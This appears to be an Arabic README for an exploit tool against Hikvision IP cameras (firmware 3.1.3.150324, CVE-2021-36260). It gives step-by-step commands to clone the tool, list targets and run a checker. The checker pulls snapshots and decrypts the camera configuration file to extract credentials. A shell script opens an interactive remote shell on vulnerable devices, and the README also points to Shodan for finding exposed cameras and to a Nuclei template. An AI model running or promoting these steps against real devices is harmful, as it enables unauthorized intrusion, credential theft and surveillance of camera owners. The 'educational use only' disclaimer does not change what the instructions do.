
HikvisionExploiter هي أداة مبنية على بايثون مصممة لأتمتة عمليات الاستغلال وفحوصات إمكانية الوصول إلى الدليل على كاميرات شبكة Hikvision من خلال استغلال واجهة الويب الإصدار 3.1.3.150324 + كشف CVE-2021-36260
HikvisionExploiter هي أداة استغلال قوية وآلية تستهدف نقاط النهاية غير الموثقة في كاميرات Hikvision IP، خاصة تلك التي تعمل بإصدار البرنامج الثابت 3.1.3.150324.
تقوم الأداة بما يلي:
أُنشئت للباحثين، وفرق الاختراق، وعشاق أمن إنترنت الأشياء.
/onvif-http/snapshot لفحص تعرض اللقطات/System/configurationFile، وفك تشفيره باستخدام AES + XOR، واستخراج بيانات الاعتماد/Security/userswebLanguagelogs/ThreadPoolExecutorpip install -r requirements.txtffmpeg (اختياري، لإمكانية تحويل اللقطات إلى فيديو مستقبلاً)pycrypto (لفك تشفير الإعدادات):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
أنشئ ملف targets.txt بالتنسيق التالي:
IP:PORT
مثال:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
سيقوم هذا بما يلي:
logs/IP_PORT_TIMESTAMP/لتشغيل أوامر تفاعلية على جهاز ضعيف:
chmod +x shell.sh
./shell.sh <ip:port>
مثال:
./shell.sh 192.168.1.10:80
إذا كان الجهاز ضعيفًا، ستدخل إلى شل تفاعلي:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
استخدم دالة Shodan التالية لتحديد مواقع كاميرات Hikvision المكشوفة:
3.1.3.150324
تم تضمين قالب متوافق مع Nuclei: nuclei-template.yaml
الاستخدام:
nuclei -t nuclei-template.yaml -list targets.txt
يكتشف:
رخصة MIT ©
انظر LICENSE لمزيد من التفاصيل.
تيليجرام: @HexBuddy127001
أُنشئت بـ ❤️ للأغراض التعليمية والأخلاقية فقط.